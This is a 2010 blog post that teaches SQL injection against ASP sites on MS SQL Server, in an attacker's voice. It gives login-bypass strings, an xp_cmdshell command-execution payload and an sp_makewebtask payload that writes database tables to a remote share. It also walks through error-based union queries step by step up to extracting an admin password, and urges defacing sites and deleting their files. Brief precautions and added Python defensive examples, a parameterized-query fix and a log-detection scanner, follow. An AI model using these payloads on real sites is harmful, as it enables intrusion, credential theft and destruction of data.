Wednesday, September 15, 2010

My SQL injection article [Covers Very Basic Examples]


SQL Injection is one of the most effective and most dangerous attacks against web applications. It is also very fast and reliable to carry out. So many times [condition: if the server is vulnerable] even a newbie can mess up and play with the web server. It is a very simple method because the attacker can run these attacks against any web server very quickly. And once he gets any information from the SQL Injection side, he/she can easily play with the site, e.g. deface it through the victim's FTP server, modify the website, and so on. Finally, my view on SQL Injection is that it is an aid to web hackers, as they don't have to labour hard for this attack vector.

-= A little description about this Injection =-

This attack vector is one type of web app hacking that requires nothing but port 80 open. It attacks the web apps themselves, i.e. [ ASP, JSP, PHP, CGI ] and many more, rather than the web server or the services running in the OS.

This attack is a nice technique to inject SQL commands or queries with the help of any web browser. I am giving priority to the browser because many web pages take parameters from users and build SQL queries to the database from them. I will discuss the mechanisms of this attack vector, because I think most web hackers already know everything I wrote above. So I will discuss a few methods and mechanisms of this injection now.

-= Let's start the Game in the Web Playground =-

When doing any SQL Injection attack always think of these things. Always google for pages like asp/php/cgi, because these pages obviously use the "POST" method to feed contents to the web server. But these pages should be related to something like "login pages or search pages or maybe feedback pages". And remember to always check the source code of the web pages, because sometimes you get some good information from the source: they have potential parameters that might be useful. Let me give you a very common example -




Note: But what happens when someone does not find any login page or any page using the POST method? At that time his duty is to find parameters like
Code:
http://website/index.asp?ID=10

Let's start the attack.
Let's take this parameter as an example: Hacker' or x=x--

I mean to say that you use this in that page:

Login : Hacker' or x=x--
Pass : Hacker' or x=x--

Or you may use it in another way, which is written below:
Code:
http://website/index.asp?ID=Hacker' or x=x--
Then obviously press the Enter key. If the admin is not taking care of his web app security then the attacker will get into his admin page or any other important login page very easily and fast.

But now a question arises: why ' or x=x-- ?
Solution :
Let us look at another example of why ' or x=x-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:
Code:
http://website/index.asp?category=info


In the URL, 'category' is the variable name, and 'info' is the value assigned to the variable. In order to do that, an ASP page might contain the following code (OK, this is actual code that I have created for this):

' Classic ASP (VBScript): the value of the "category" parameter is pasted straight into the SQL text
v_cat = request("category")
sqlstr="SELECT * FROM tablename WHERE XCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As you can see, my value will be wrapped into v_cat and thus the SQL statement becomes:

SELECT * FROM tablename WHERE XCategory='info'

The query will now return a result set containing one or more rows that match the WHERE condition, in this case 'info'.

Now assume that I change the URL into something like:
Code:
http://website/index.asp?category=info' or x=x--

Now my variable v_cat equals "info' or x=x-- ", and if I substitute this into the SQL query I get:

SELECT * FROM tablename WHERE XCategory='info' or x=x--'

The query should now select everything from the table regardless of whether XCategory is equal to 'info' or not. A "--" tells SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes # is used instead of [--], but this is rare.

If it is not SQL Server and you simply cannot ignore the rest of the query, you can use this injection method instead:

' or 'x'='x

As a result my query will now look like this:

SELECT * FROM tablename WHERE XCategory='info' or 'x'='x'

And it will also give you the same output.

From my experience you can also use some of my favourite injection strings, which are written below:

' or x=x--
'' or x=x--
or x=x--
' or 'x'='x
'' or ''x''=''x
') or ('x'='x

And many more. You can also make some of your own dangerous injection strings to get into the site.
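The mechanism above, as an added example that is not code from the original post: the ASP concatenation pattern rebuilt in Python against an in-memory SQLite database, beside a parameterized version of the same query and an integer-converted lookup for the numeric ID parameter (the real fix, rather than filtering characters). The table, column and row contents are constructed for the demo; the ' or 'x'='x variant is used because SQLite has no column named x, so x=x would raise an error rather than bypass the condition.

```python
import sqlite3

# Constructed demo table standing in for the article's "tablename" / XCategory.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE tablename (ID INTEGER PRIMARY KEY, XCategory TEXT, item TEXT);
    INSERT INTO tablename VALUES (10, 'info',   'public notice');
    INSERT INTO tablename VALUES (11, 'food',   'menu');
    INSERT INTO tablename VALUES (12, 'secret', 'admin notes');
""")


def vulnerable_lookup(v_cat):
    """Same construction as the ASP line: the parameter is pasted into the SQL text."""
    sqlstr = "SELECT * FROM tablename WHERE XCategory='" + v_cat + "'"
    return conn.execute(sqlstr).fetchall()


def safe_lookup(v_cat):
    """Bound parameter: a quote inside v_cat is data, never SQL syntax."""
    return conn.execute("SELECT * FROM tablename WHERE XCategory=?", (v_cat,)).fetchall()


def safe_lookup_by_id(id_value):
    """Numeric parameter (index.asp?ID=10): convert to int before any SQL is built,
    so anything appended after the number is rejected with ValueError."""
    return conn.execute("SELECT * FROM tablename WHERE ID=?", (int(id_value),)).fetchall()


if __name__ == "__main__":
    payload = "info' or 'x'='x"
    print(vulnerable_lookup(payload))   # all three rows: the WHERE clause is always true
    print(safe_lookup(payload))         # []: no category literally named "info' or 'x'='x"
    print(safe_lookup_by_id("10"))      # [(10, 'info', 'public notice')]
    try:
        safe_lookup_by_id("10 union select top 1 table_name from INFORMATION_SCHEMA.TABLES--")
    except ValueError as err:
        print("rejected:", err)
```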

-= Remote Execution =-

Now I will tell you something about the stored procedures used for administration in Windows that SQL Injection can reach. So you can use a cool stored procedure like master..xp_cmdshell.

Example of this stored procedure:

'; exec master..xp_cmdshell 'ping xxx.xxx.xx.xx'--

If you are not able to succeed then you should just try double quotes ["] instead of single quotes ['].

Why is ; used?

It is used because it ends the current SQL query and allows a new SQL command to start. If you want to know whether the command executed successfully or not then you may try this cool and simple trick: you can listen for the ICMP packets coming from xxx.xxx.xx.xx.

So you have to type this in your shell box:

root# tcpdump icmp

If you do not get any ping request from the server you attacked then you can assume that the web admin is quite clever and has restricted the use of this stored procedure to a certain limited set of users.

-= Output of Your inserted Queries of MySQL =-

Attackers generally use this trick to write the output of their queries into an HTML page.

However the syntax is '; exec master..sp_makewebtask "\\10.10.1.3\docs\main.html","select * from INFORMATION_SCHEMA.TABLES"...

But the main thing we have to see is that the victim should have a directory named "docs" and this folder should be shared for all users.

-= Error Messages [Really a Boon for Web Attackers, but How?] =-

Really, sometimes if the web application is vulnerable then it displays some valuable information [in the form of error messages] and thus the attacker utilizes the error in a proper manner.

Now I am discussing the method below:

Suppose you are on a page such as
Code:
http://website/index.asp?ID=10

Now let's start the real game...

Just simply modify the URL in the manner mentioned below:
Code:
http://website/index.asp?ID=10 union select top 1 table_name from INFORMATION_SCHEMA.TABLES--

Now obviously a doubt will arise in your mind: "What is INFORMATION_SCHEMA.TABLES?"

Ans : This is a system table which holds the names of all the tables in your favourite database server.

Dangerous Syntax : select top 1 table_name from INFORMATION_SCHEMA.TABLES--

What is the objective of this syntax?

Ans : This cool syntax will give you the 1st table name from your DB [database]. And when I union that string value with the integer datatype value 10, our server [here MS SQL] will try to make a conversion [from the string value (known as 'nvarchar') to an integer]. As a result it will obviously generate an error message, because 'nvarchar can't be converted into the integer datatype'. So the server will be a bit confused and will produce the error message written below:

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'data' to a column of data type int. /index.asp,line 3.

Wow, cool, we got a really useful error message. Now let's see how I get deeper with the help of this error message...

Now, this is how you get the next table name with the query. So here is the solution.
Code:
http://website/index.asp?ID=10 union select top 1 table_name from INFORMATION_SCHEMA.TABLES where table_name not in ('data')--

Output of this nice query:

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'adm_log' to a column of data type int. /index.asp,line 3.

Another Nice Syntax :-

I can also use another useful system table, INFORMATION_SCHEMA.COLUMNS, for mapping out the column names of a table.

So my query will now be:
Code:
http://website/index.asp?ID=10 union select top 1 column_name from INFORMATION_SCHEMA.COLUMNS where table_name='adm_log'--

And its output will be as follows:

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'lg_id' to a column of data type int. /index.asp,line 3.

So now I have the first column name, and now I will use NOT IN() in the query string to get the next column name.
Code:
http://website/index.asp?ID=10 union select top 1 column_name from INFORMATION_SCHEMA.COLUMNS where table_name='adm_log' and column_name not in ('lg_id')--

I will then get the following output.

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'lg_name' to a column of data type int. /index.asp,line 3.

Now I have got a lot of things and these are sufficient to get into the site [if luck is with me]. So now I will finally make another query which will give me the password of the admin of the vulnerable site.

So let's finalize and have fun.

Use this syntax to get the admin's username:
Code:
http://website/index.asp?ID=10 union select top 1 lg_name from adm_log--

And now this will display the following error msg.

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'vulnadmin' to a column of data type int. /index.asp,line 3.

Now from this error message I come to know that the admin name for the vulnerable site is 'vulnadmin' [no quotes]. So now this is the right time to get the password of 'vulnadmin' with this simple query.
Code:
http://website/index.asp?ID=10 union select top 1 password from adm_log where lg_name='vulnadmin'--

Now I get a nice error msg which shows the password of the admin. The output is as follows:

MS OLE DB Provider for ODBC Drivers error 'error number'
[MS][ODBC SQL Server Driver][SQL Query]syntax error converting the nvarchar value 'c00lp4ss' to a column of data type int. /index.asp,line 3.

From the above error message it is clearly shown that the password for 'vulnadmin' is 'c00lp4ss'. And once someone has the admin password, the attacker can mess up or deface the site easily, or may log in to the FTP server and delete all the files from the web server.

-= Precautions against the SQL Injection Attack Vector =-

-> Always filter input characters like ' or '' or \ or ; and extended characters like NULL.
-> For numeric values, convert them into an integer before putting them into the SQL statement.
-> Always delete stored procedures which are no longer useful, like master..xp_cmdshell, xp_startmail, sp_makewebtask and xp_sendmail.
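To complement the precautions, an added example that is not from the original post: a small scanner that flags the probes walked through in the error-message and xp_cmdshell sections when they show up in web-server access logs. The log lines, the log-format regex and the signature list are constructed assumptions for the demo, not a complete rule set; the point it makes is that the query string must be URL-decoded and normalized before matching, since the same payload arrives as %27, +, %20 or mixed case, and that a 500 response beside a union/INFORMATION_SCHEMA hit is exactly the error-based enumeration described above.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log: one benign request, three probes of the
# kinds shown in the article, and one benign line that merely contains the word "union".
SAMPLE_LOG = """\
10.0.0.5 - - [15/Sep/2010:10:01:02 +0000] "GET /index.asp?ID=10 HTTP/1.1" 200 512
10.0.0.7 - - [15/Sep/2010:10:01:09 +0000] "GET /index.asp?ID=10%20union%20select%20top%201%20table_name%20from%20INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 500 1320
10.0.0.7 - - [15/Sep/2010:10:01:20 +0000] "GET /index.asp?category=info%27+or+%27x%27%3D%27x HTTP/1.1" 200 9120
10.0.0.9 - - [15/Sep/2010:10:02:00 +0000] "GET /index.asp?ID=11%3B+exec+master..xp_cmdshell+%27ping+10.0.0.9%27-- HTTP/1.1" 500 1320
10.0.0.5 - - [15/Sep/2010:10:03:00 +0000] "GET /search.asp?q=union+square HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the techniques shown in the article. They run on the decoded, lower-cased,
# whitespace-collapsed query string so %20 / + / mixed case do not hide a match.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)"),
    "stacked-proc": re.compile(r";\s*exec\b.*\b(xp_cmdshell|sp_makewebtask)\b"),
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+"),
}


def normalize(path):
    """Return the query string of a request path, URL-decoded, lower-cased, spaces collapsed."""
    query = path.partition("?")[2]
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()


def scan(log_text):
    """Return (client ip, HTTP status, matched signature names) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = normalize(m.group("path"))
        names = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if names:
            hits.append((m.group("ip"), int(m.group("status")), names))
    return hits


if __name__ == "__main__":
    for ip, status, names in scan(SAMPLE_LOG):
        print(f"{ip} status={status} matched={names}")
```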

